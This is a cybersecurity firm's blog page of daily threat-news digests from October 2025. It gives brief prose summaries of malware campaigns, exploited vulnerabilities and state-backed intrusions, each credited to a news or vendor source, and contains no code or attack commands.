Author: AresISEC Security Team

Security Security News Uncategorized

Security Highlights Of The Day [21/10/25]

TikTok Videos Continue to Push Infostealers in ClickFix Attacks

Cybercriminals are using TikTok videos disguised as free activation guides for popular software (Windows, Spotify, Netflix, Microsoft 365, Adobe, CapCut Pro, Discord Nitro and others) to spread information-stealing malware. The videos perform ClickFix attacks — social-engineering “fixes” that trick users into executing malicious PowerShell commands or other scripts that infect their machines with infostealers.

Source: BleepingComputer

Google Ads for Fake Homebrew, LogMeIn Sites Push Infostealers

A malicious campaign targets macOS developers with fake Homebrew, LogMeIn and TradingView sites promoted via ads to deliver infostealers such as AMOS (Atomic macOS Stealer) and Odyssey. The campaign uses ClickFix techniques to trick targets into running commands in Terminal, causing them to self-install malware.

Source: BleepingComputer

131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign

Researchers uncovered a coordinated campaign using 131 rebranded clones of a WhatsApp Web automation Chrome extension to spam Brazilian users at scale. The extensions share code, design patterns, and infrastructure, collectively serving ~20,905 active users and automating bulk outreach to bypass WhatsApp’s anti-spam controls.

Source: TheHackerNews

Amazon’s AWS Recovering After Major Outage Disrupts Apps, Services Worldwide

Amazon Web Services reported recovery after a widespread outage that knocked out thousands of websites and disrupted major apps (including Snapchat and Reddit), causing global service interruptions. Systems began returning online after roughly three hours, with AWS reporting significant signs of recovery while working through a backlog of queued requests.

Source: Reuters

Salt Typhoon Uses Citrix Flaw in Global Cyber-Attack

Researchers linked an intrusion to China-based group Salt Typhoon (aka Earth Estries/GhostEmperor/UNC2286) that exploited a Citrix NetScaler Gateway vulnerability, using DLL sideloading and zero-day techniques to infiltrate systems. The group has targeted critical sectors (telecom, energy, government) across 80+ countries, employing advanced tactics to evade detection.

Source: Infosecurity Magazine

Security Security News Uncategorized

Security Highlights Of The Day [20/10/25]

Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities

On Oct. 15, 2025, F5 disclosed a long-term compromise of their corporate networks in which a nation-state actor exfiltrated files from BIG-IP product development and engineering knowledge platforms, including some source code and information about undisclosed vulnerabilities. F5 stated it has no evidence of active exploitation of undisclosed critical or remote code vulnerabilities and found no indication of access to CRM, financial, support case management, or iHealth systems; some exfiltrated files contained configuration or implementation information for a small percentage of customers.

Source: Unit42 (Palo Alto Networks)

Over 266,000 F5 BIG-IP Instances Exposed to Remote Attacks

Shadowserver Foundation found more than 266,000 F5 BIG-IP instances exposed online following F5’s disclosure of a network breach and stolen source code. F5 released patches addressing 44 vulnerabilities (including ones referenced in the incident) and urged customers to update BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients immediately, while noting there is no current knowledge of undisclosed critical remote code execution vulnerabilities being exploited.

Source: BleepingComputer

Microsoft Revokes 200 Fraudulent Certificates Used in Rhysida Ransomware Campaign

Microsoft revoked more than 200 certificates used by an actor tracked as Vanilla Tempest to fraudulently sign malicious binaries distributed in fake Teams setup files that delivered the Oyster backdoor and deployed Rhysida ransomware. The activity was detected in late September 2025 and disrupted earlier in October; Microsoft updated security solutions to flag signatures associated with the fake setup files, the Oyster backdoor, and Rhysida ransomware.

Source: TheHackerNews

Researchers Uncover WatchGuard VPN Bug That Could Let Attackers Take Over Devices

A critical out-of-bounds write vulnerability in WatchGuard Fireware, tracked as CVE-2025-9242 (CVSS 9.3), affects multiple Fireware OS versions and may allow unauthenticated remote attackers to execute arbitrary code on perimeter appliances. WatchTowr Labs notes the flaw has characteristics attractive to ransomware groups—affecting an internet-exposed service and being exploitable without authentication—prompting advisories and patches from WatchGuard.

Source: TheHackerNews

‘Highest Ever’ Severity Score Assigned by Microsoft to ASP.NET Core Vulnerability

Microsoft assigned a CVSS score of 9.9 to an HTTP request smuggling vulnerability in Kestrel (ASP.NET Core’s web server), tracked as CVE-2025-55315—the highest severity score assigned by Microsoft to date. The flaw could allow an attacker to smuggle an HTTP request inside another request to bypass front-end security controls or hijack user credentials, prompting urgent mitigation and updates.

Source: SecurityWeek

Security Security News Uncategorized

Security Highlights Of The Day [16/10/25]

Defrosting PolarEdge’s Backdoor

Researchers at Sekoia.io analyzed a botnet dubbed PolarEdge, first detected in January 2025, which exploits CVE-2023-20118 to achieve remote code execution (RCE) and deploy a web shell on target routers. A subsequent attack in February 2025 involved a remote command that installed a TLS-based backdoor implant. The campaign also includes related payloads targeting Asus, QNAP, and Synology routers, revealing a broader family of attacks.

Source: Sekoia

Mysterious Elephant: A Growing Threat

Kaspersky GReAT researchers have detailed activity from Mysterious Elephant, an APT group targeting government and foreign affairs organizations in the Asia-Pacific region. Active since 2023, the group adapts its tactics, using WhatsApp exploitation to exfiltrate documents and other sensitive data. Its 2025 campaigns rely on new custom-made and modified open-source tools like BabShell and MemLoader to enhance stealth and effectiveness.

Source: Securelist (Kaspersky)

Operation Zero Disco: Attackers Exploit Cisco SNMP Vulnerability to Deploy Rootkits

Trend Micro discovered an operation exploiting Cisco’s SNMP vulnerability (CVE-2025-20352) to deploy Linux rootkits on vulnerable network devices. Attackers used spoofed IPs and Mac email addresses, with the malware setting a universal password containing the word “disco.” Once implanted, it hooks into IOSd components, achieving fileless persistence. While newer Cisco switch models use ASLR for protection, repeated attempts can still succeed.

Source: TrendMicro

PhantomVAI Loader Delivers a Range of Infostealers

Palo Alto Networks’ Unit 42 team reported phishing campaigns using PhantomVAI Loader to deliver various information-stealing malware through multi-stage infection chains. Originally linked to Katz Stealer, the loader now distributes AsyncRAT, XWorm, FormBook, and DCRat. Sold as malware-as-a-service, PhantomVAI Loader employs steganography and obfuscation to conceal payloads and evade detection.

Source: Unit42 (Palo Alto Networks)

New Android Pixnapping Attack Steals MFA Codes Pixel-By-Pixel

A newly discovered side-channel attack named Pixnapping allows a malicious Android app to capture pixels displayed by other apps or websites and reconstruct sensitive data, including chat messages, emails, and two-factor authentication codes. Developed by researchers from seven U.S. universities, the attack works on fully patched modern Android devices and can steal 2FA codes in under 30 seconds.

Source: BleepingComputer

Security Security News Uncategorized

Security Highlights Of The Day [15/10/25]

New Stealit Campaign Abuses Node.js Single Executable Application

FortiGuard Labs has identified a new and active Stealit malware campaign leveraging Node.js’ Single Executable Application (SEA) feature to distribute payloads. The campaign began after a spike in detections of a Visual Basic script later confirmed to serve persistence purposes. Unlike earlier Stealit campaigns built with Electron, this version uses Node.js’ SEA to bundle scripts and assets into standalone binaries, enabling execution without a pre-installed Node.js runtime.

Source: Fortinet

GhostBat RAT: Inside the Resurgence of RTO-Themed Android Malware

Cyble Research and Intelligence Labs (CRIL) observed a surge in Android malware campaigns disguised as Indian RTO applications. Distributed via WhatsApp messages, SMS, and compromised websites, these fake apps capture banking credentials, UPI PINs, and exfiltrate SMS messages with financial keywords. Some variants even include cryptocurrency mining features. Infected devices are registered through a Telegram bot named GhostBatRat_bot, linking the campaign to the GhostBat RAT malware.

Source: Cyble

When the Monster Bytes: Tracking TA585 and Its Arsenal

Proofpoint researchers have uncovered a new cybercriminal actor, TA585, operating with high sophistication and distributing malware like MonsterV2, a remote access trojan, stealer, and loader. MonsterV2 is sold on hacking forums and used by a small number of actors. TA585 stands out for managing its own infrastructure, delivery, and malware deployment without relying on third-party services or brokers.

Source: Proofpoint

Chinese Hackers Abuse Geo-Mapping Tool for Year-Long Persistence

Chinese state-sponsored hackers remained undetected for over a year by exploiting a component in Esri’s ArcGIS geo-mapping tool, converting it into a web shell. ArcGIS, widely used by municipalities and infrastructure operators, supports server object extensions that extend its functionality. ReliaQuest researchers attribute the attack to a Chinese APT group, likely Flax Typhoon, based on operational similarities.

Source: BleepingComputer

npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels

Researchers have discovered malicious packages across npm, Python, and Ruby ecosystems using Discord as a command-and-control channel. Attackers exploit Discord webhooks to transmit stolen data to actor-controlled channels, as webhooks can post messages without authentication and are write-only, preventing defenders from reviewing prior posts. This approach shifts the economics of supply chain attacks by leveraging widely accessible cloud-based tools.

Source: TheHackerNews

AresISEC d.o.o. · Zagreb, Croatia · OIB: 49411602130 · info@aresisec.hr

Privacy Policy  | Terms of Service Responsible Disclosure

© 2026 AresISEC

Facebook-f Linkedin Wpforms
Scroll to top